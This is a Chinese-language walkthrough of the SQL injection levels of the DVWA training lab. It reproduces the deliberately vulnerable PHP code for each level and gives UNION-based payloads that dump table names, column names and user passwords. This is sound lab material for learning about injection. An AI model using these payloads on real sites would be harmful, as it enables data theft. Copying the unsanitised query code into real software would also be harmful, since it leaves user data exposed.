总结了dvwa中的sql注入关卡
Low
代码复现如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| <?php
include ("sql-connection.php");
if (isset($_POST['id']) && isset($_POST['submit'])){ $id=$_POST['id']; $sql="SELECT first_name , last_name FROM users WHERE user_id='$id'"; $result=mysql_query($sql) or die(mysql_error()); while($row=mysql_fetch_assoc($result)){ $first=$row['first_name']; $last=$row['last_name']; echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; }
}
?>
|
这关毫无过滤的sql语句
提示输入id,判断可能是数字型注入
输入1
data:image/s3,"s3://crabby-images/8af41/8af4177f0473457f4a86e20757a39e4896987d8e" alt=""
再输入1’
data:image/s3,"s3://crabby-images/d92c5/d92c55c5fb6ad2bf9b4173bdb2b30255428a267d" alt=""
出现报错,从错误信息判断是数字型注入,且被单引号包裹
输入1’#
data:image/s3,"s3://crabby-images/5ecf0/5ecf0831db89eb575003d1f8b54d8d1d8403952b" alt=""
没有报错
接下来判断查询字段数
输入1’ order by 3
data:image/s3,"s3://crabby-images/c1dba/c1dbab72d2368ce42fa2df72d13c19c8124679d9" alt=""
说明查询字段数为2
那么就用联合查询来爆库
输入0’ union select database(),2 #
data:image/s3,"s3://crabby-images/08a1e/08a1eda83e8149c959084967a7904ff8f9374781" alt=""
输入0’ union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
爆表
data:image/s3,"s3://crabby-images/b4994/b4994d4cec4b594f95610b705ccab95389f66385" alt=""
输入0’ union select group_concat(column_name),2 from information_schema.columns where table_name=’users’#
爆列
data:image/s3,"s3://crabby-images/1c7d9/1c7d9670e047b12d6054c301d09297464fd39447" alt=""
输入0’ union select password,user_id from users #
爆数据
data:image/s3,"s3://crabby-images/abc72/abc72bce57b1937547f3dd28506e47e301d239b3" alt=""
Medium
代码复现如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| <?php
include("sql-connection.php");
if(isset($_POST['submit'])){ $id=$_POST['id']; $id=mysql_real_escape_string($id); $sql="SELECT first_name,last_name FROM users where user_id=$id"; $result=mysql_query($sql) or die(mysql_error()); while($row=mysql_fetch_assoc($result)){ $first=$row['first_name']; $last=$row['last_name']; echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } }
?>
|
这关很明显是数字型注入,通过选择表单中的数字作为注入点,我们可以用burp抓包修改post的id值
data:image/s3,"s3://crabby-images/195cd/195cd4a0f51f1e9e2999585b2bdd740ed2ebe2d1" alt=""
data:image/s3,"s3://crabby-images/2e50e/2e50e146924b995e63e4712c5ddecd339e99b311" alt=""
这里id值虽然通过mysql_real_escape函数被转义处理,但是由于id没有被引号包裹,所以没有什么区别
先判断查询字段数
data:image/s3,"s3://crabby-images/9805f/9805ff130f1dbb2ba52ae38be85882d4a5ab36d5" alt=""
字段数为2
接下来爆库
data:image/s3,"s3://crabby-images/49448/49448cac59e45af875668af6282d50b0774894b7" alt=""
爆表
data:image/s3,"s3://crabby-images/84d85/84d853e1e70a0a306a731f6ebaf2fd37ef6b6409" alt=""
爆列
data:image/s3,"s3://crabby-images/1d7e9/1d7e99b530fb2436a0dbcad2a862e830855c8a6d" alt=""
因为这里单引号被包裹,所以users可以转成十六进制数从而绕过转义
爆数据
data:image/s3,"s3://crabby-images/0f901/0f9011de09ad3baebbf13e5e1bcb1db0e76ed9e5" alt=""
High
这关有两个页面,一个页面用来输入id值,输入的id值经过sql查询后的信息显示在主页面上
输入id值的页面代码如下:
1 2 3 4 5 6 7 8 9 10 11
| <?php
session_start();
if(isset($_POST['id']) && isset($_POST['submit'])){ $_SESSION['id']=$_POST['id']; }
echo "Session ID:".$_SESSION['id'];
?>
|
主页面代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| <?php
session_start();
include("sql-connection.php");
if (isset($_SESSION['id'])){ $id=$_SESSION['id']; $sql="SELECT first_name , last_name FROM users where user_id='$id'"; $result=mysql_query($sql) or die(mysql_error()); while($row=mysql_fetch_assoc($result)){ $first=$row['first_name']; $last=$row['last_name']; echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } }
?>
|
这关把post的id值赋值给session的id值
注入点仍然是id值
跟上面关卡没什么本质区别
爆库
data:image/s3,"s3://crabby-images/793ec/793ecf6ce847cd63b73d310ca7f33939ec35e15f" alt=""
data:image/s3,"s3://crabby-images/84c98/84c98a57375a5eea7b3632488678deed3669a694" alt=""
爆表
data:image/s3,"s3://crabby-images/16c0f/16c0feca77807a6443778075e20ac149b2be59dc" alt=""
data:image/s3,"s3://crabby-images/accf5/accf545af56273d75ea770f73c8c562b6a4879dd" alt=""
爆列
data:image/s3,"s3://crabby-images/3981d/3981d3c498d862328dd7fd8bf3bb6420db4beece" alt=""
data:image/s3,"s3://crabby-images/05101/05101690b15f1ff1b1ae89ba87157ab91693b963" alt=""
爆数据
data:image/s3,"s3://crabby-images/3a732/3a732eaad66d70733d5041eef8527d04e8b1c46e" alt=""
data:image/s3,"s3://crabby-images/4762f/4762fd458b53dc26dd768bfe35225ea3b5668e92" alt=""